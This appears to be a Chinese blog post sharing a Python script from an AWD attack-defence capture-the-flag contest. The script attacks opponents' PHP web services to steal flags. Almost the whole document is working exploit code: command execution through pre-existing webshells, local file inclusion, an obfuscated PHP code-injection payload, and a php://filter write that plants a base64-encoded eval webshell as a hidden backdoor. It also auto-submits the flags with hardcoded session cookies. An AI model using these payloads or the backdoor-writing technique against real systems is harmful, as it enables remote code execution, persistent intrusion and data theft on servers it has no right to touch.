AWD FLAG SCRIPT
AWD FLAG脚本⌗
之前AWD的自动写🐴获取flag脚本。
import requests
import re
import json
import time
import random
def filename():
return '.'+str(int(random.uniform(10000000, 99999999)))+'.php'
def exp1(target):
url = 'http://'+target+'/admin/test.php'
data = {"cmd":"system('cat /flag');"}
try:
r = requests.post(url=url, data=data, timeout=3)
res = 'flag{'+re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)[0]+'}'
# res = re.findall(r"flag{.*}", r.text)
print('[+]Flag Found: '+target+'->'+res)
return res
except Exception:
pass
def exp2(target):
url = 'http://'+target+'/about.php?file=/flag'
try:
r = requests.get(url=url,timeout=3)
res = 'flag{'+re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)[0]+'}'
print('[+]Flag Found: '+target+'->'+res)
return res
except Exception:
pass
def exp3(target):
url = 'http://'+target+'/admin/editor.php'
data = {"boy":"cat /flag"}
try:
r = requests.post(url=url, data=data, timeout=3)
res = 'flag{'+re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)[0]+'}'
print('[+]Flag Found: '+target+'->'+res)
return res
except Exception:
pass
def exp4(target):
Filename = filename()
write_backdoor_url = 'http://'+target+'/admin/type.php?m=sPD9waHAgZXZhbChAJF9QT1NUWydjbWQnXSk7Pz4=&file=php://filter/write=convert.base64-decode/resource='+Filename
getflag_url = 'http://'+target+'/admin/'+Filename
data = {"cmd":"system('cat /flag');"}
try:
s = requests.get(url=write_backdoor_url)
print "[+]Backdoor is Write in :"+getflag_url
time.sleep(1)
r = requests.post(url=getflag_url, data=data, timeout=3)
res = 'flag{'+re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)[0]+'}'
# res = re.findall(r"flag{.*}", r.text)
print('[+]Flag Found: '+target+'->'+res)
return res
except Exception:
pass
def exp5(target):
url = 'http://'+target+'/admin/articlelist.php?a=cat%20/flag&str=2;$a=sys.tem;$b=curr.ent;$a($b($b($GLOBALS)));'
try:
r = requests.get(url=url,timeout=3)
res = 'flag{'+re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)[1]+'}'
print('[+]Flag Found: '+target+'->'+res)
return res
except Exception:
pass
def exp6(target):
url = 'http://'+target+'/.aa'
try:
r = requests.get(url=url,timeout=3)
res = 'flag{'+re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)[0]+'}'
print('[+]Flag Found: '+target+'->'+res)
return res
except Exception:
pass
def submit(flag_value):
url = 'http://x.x.x.x:8000/api/v1/challenges/attempt'
data = json.dumps({"challenge_id":1,"submission":flag_value})
headers = {
'Accept': 'application/json',
'CSRF-Token': 'c7b3f18a7eac5935b8f4279e53be8824fc304d85599c6e5ebd9ae4e701bb640e',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36',
'Content-Type': 'application/json',
'Origin': 'http://x.x.x.x:8000',
'Referer': 'http://x.x.x.x:8000/challenges',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cookie': 'PHPSESSID=to9lsb0m9jrpv1hmdg37he5aa2; session=1f8b1fe6-ab39-4fa4-a03d-617a80f0b2b7',
'Connection': 'close'
}
s = requests.session()
req = s.post(url = url,headers=headers,data=data,verify = False)
print(req.text)
if __name__ == "__main__":
for i in range(8,15):
ip = "x.x.x.x:3{}80".format(str(i).rjust(2,'0'))
# flag = exp1(ip)
flag = exp2(ip)
# flag = exp3(ip)
# flag = exp4(ip)
# flag = exp5(ip)
# flag = exp6(ip)
# submit(flag)
# a=cat%20/flag&str=2;$a=sys.tem;$b=curr.ent;$a($b($b($GLOBALS)));